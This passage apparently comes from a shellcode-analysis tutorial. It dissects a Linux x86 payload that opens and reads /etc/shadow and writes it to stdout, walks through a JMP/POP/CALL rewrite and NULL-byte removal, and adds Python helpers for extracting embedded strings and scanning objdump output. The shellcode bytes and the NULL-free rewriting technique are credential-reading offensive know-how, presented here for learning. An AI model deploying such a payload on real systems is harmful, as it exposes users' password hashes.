When we try to compile the copied ASM file, an error occurs:
$ ../compile_asm.sh asm_linx86_readfile_sample3
[+] Assembling with Nasm ...
[+] Linking ...
asm_linx86_readfile_sample3.o: In function `_start':
asm_linx86_readfile_sample3.asm:(.text+0x1): relocation truncated to fit: R_386_PC8 against `*UND*'
[+] Done!
This is caused by the backward call at the end of the code, which ndisasm emitted as a raw offset rather than a label: the assembler cannot resolve a relative jump to a bare address in this shellcode, so the relocation fails.
Commenting the ASM file
When we analyze the ASM file we see quite a few int 0x80 instructions, which tells us several system calls are being made.
In short, the following syscalls are used, identified by the number placed in EAX before each int 0x80:
– open (0x5) → opens the file whose pathname is embedded in the shellcode
– read (0x3) → reads the contents of the opened file
– write (0x4) → writes the contents to the designated FD, STDOUT in this example
– exit (0x1) → exits gracefully
Finding the string
Remember our search for strings in the previously generated shellcode? For those who don’t: some odd-looking instructions appear at the end of the ASM file, which is ndisasm trying to decode the data bytes as code:
call dword 0x2
; BEGIN STRING
das
gs jz 0xa4
das
jnc 0xac
popad
fs outsd
ja 0x49
; END STRING
Checking our previously generated output from ndisasm, we find the part of the shellcode that most likely contains the path string:
"\xe8\xc5\xff\xff\xff\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00"
The first five bytes are the call instruction and produce gibberish, which we don’t want, when we convert the whole thing to a string using echo:
$ echo -ne "\xe8\xc5\xff\xff\xff\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00"
�����/etc/shadow
Stripping the first five bytes, up to and including the last \xff, gives us the string we want:
$ echo -ne "\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00"
/etc/shadow
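The manual echo steps above can be automated for any shellcode that embeds a string this way. The following is an added example, not code from the original post: it unescapes a \xNN string, locates each backward-pointing call rel32 (the CALL/POP pattern used here) and returns the NUL-terminated, printable bytes that follow it. The sample bytes are the ones quoted above; the function names are my own.

```python
import re
import struct

# Constructed sample: the tail of the shellcode as quoted on the page
# (call rel32 followed by a NUL-terminated path string).
SAMPLE = r"\xe8\xc5\xff\xff\xff\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00"


def unescape(escaped: str) -> bytes:
    """Turn a \\xNN-escaped string (as printed by msfvenom or echo) into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", escaped))


def find_call_strings(code: bytes):
    """Return [(offset, rel32, string)] for every E8 call whose rel32 points
    backwards: in the CALL/POP pattern the bytes after such a call, up to the
    first NUL, are data (the string), not instructions."""
    results = []
    for i in range(len(code) - 4):
        if code[i] != 0xE8:
            continue
        rel = struct.unpack_from("<i", code, i + 1)[0]  # signed 32-bit displacement
        if rel >= 0:
            continue  # forward call: not the string-embedding pattern
        start = i + 5  # first byte after the 5-byte call instruction
        end = code.find(b"\x00", start)
        if end == -1:
            continue
        data = code[start:end]
        if not data or not all(0x20 <= b < 0x7F for b in data):
            continue  # require printable ASCII to avoid matching random E8 bytes
        results.append((i, rel, data.decode("ascii")))
    return results


if __name__ == "__main__":
    for off, rel, text in find_call_strings(unescape(SAMPLE)):
        print(f"call at +{off:#x} (rel32 {rel}) is followed by string: {text}")
```

The printable-ASCII check matters: an 0xE8 byte can occur inside an immediate or address, so without it a scan over a full payload would report false hits.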
JMP/POP/CALL
Having understood most of the ASM file in terms of its syscalls and their parameters, we are left with the call whose target ndisasm could not resolve to a label.
Let’s fix that using the JMP/POP/CALL technique.
$ cp asm_linx86_readfile_sample3.asm asm_linx86_readfile_jmp-pop-call_sample3.asm
Removing NULL’s
Still, the ASM file isn’t perfect: several instructions contain NULL bytes in their encoding (the 32-bit immediates of the mov instructions), which break the shellcode.
We can check this by running objdump after compiling our modified ASM file:
$ ../compile_asm.sh asm_linx86_readfile_jmp-pop-call_sample3
[+] Assembling with Nasm ...
[+] Linking ...
[+] Done!
$ objdump -M intel -d asm_linx86_readfile_jmp-pop-call_sample3
asm_linx86_readfile_jmp-pop-call_sample3: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: b8 05 00 00 00 mov eax,0x5
8048065: 5b pop ebx
8048066: 31 c9 xor ecx,ecx
8048068: cd 80 int 0x80
804806a: 93 xchg ebx,eax
804806b: eb 23 jmp 8048090 <string>
0804806d <append>:
804806d: 59 pop ecx
804806e: b2 0b mov dl,0xb
8048070: b8 03 00 00 00 mov eax,0x3
8048075: cd 80 int 0x80
8048077: 92 xchg edx,eax
8048078: bb 01 00 00 00 mov ebx,0x1
804807d: b8 04 00 00 00 mov eax,0x4
8048082: cd 80 int 0x80
8048084: b8 01 00 00 00 mov eax,0x1
8048089: bb 00 00 00 00 mov ebx,0x0
804808e: cd 80 int 0x80
08048090 <string>:
8048090: e8 d8 ff ff ff call 804806d <append>
08048095 <AppendString>:
8048095: 2f das
8048096: 65 gs
8048097: 74 63 je 80480fc <AppendString+0x67>
8048099: 2f das
804809a: 73 68 jae 8048104 <AppendString+0x6f>
804809c: 61 popa
804809d: 64 6f outs dx,DWORD PTR fs:[esi]
804809f: 77 .byte 0x77
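Spotting the offending bytes by eye works for a short listing, but it is easy to miss one. The following is an added example, not code from the original post: it parses objdump -M intel -d output (in the space-separated form shown above) and reports every instruction whose encoding contains 0x00, together with the total count. The listing embedded below is a constructed excerpt of the page’s own output; the function names are my own.

```python
import re

# Constructed sample: an excerpt of the objdump listing shown on the page.
LISTING = """\
08048060 <_start>:
8048060: b8 05 00 00 00 mov eax,0x5
8048065: 5b pop ebx
8048066: 31 c9 xor ecx,ecx
8048068: cd 80 int 0x80
804806d: 59 pop ecx
804806e: b2 0b mov dl,0xb
8048070: b8 03 00 00 00 mov eax,0x3
8048078: bb 01 00 00 00 mov ebx,0x1
8048089: bb 00 00 00 00 mov ebx,0x0
8048090: e8 d8 ff ff ff call 804806d <append>
804809f: 77 .byte 0x77
"""

# address, one or more hex byte pairs, then the rest of the line (mnemonic/operands)
LINE_RE = re.compile(r"^\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s+)+)(.*)$")


def parse_objdump(listing: str):
    """Return [(address, encoded_bytes, instruction_text)] for each instruction
    line; symbol headers such as '08048060 <_start>:' do not match and are skipped."""
    out = []
    for line in listing.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        addr = int(m.group(1), 16)
        code = bytes.fromhex(re.sub(r"\s", "", m.group(2)))
        out.append((addr, code, m.group(3).strip()))
    return out


def find_null_bytes(listing: str):
    """Return [(hex address, hex bytes, instruction)] for instructions that encode 0x00."""
    return [
        (hex(addr), code.hex(" "), text)
        for addr, code, text in parse_objdump(listing)
        if 0 in code
    ]


def null_count(listing: str) -> int:
    """Total number of 0x00 bytes across all instruction encodings."""
    return sum(code.count(0) for _, code, _ in parse_objdump(listing))


if __name__ == "__main__":
    for addr, code, text in find_null_bytes(LISTING):
        print(f"{addr}: {code:<16} {text}")
    print(f"{null_count(LISTING)} NULL byte(s) in total")
```

Run it against a fresh listing with `objdump -M intel -d <binary> | python3 nullscan.py` (reading stdin instead of the embedded sample) after each edit; a clean result means the listing contains no 0x00 byte anywhere in the code section.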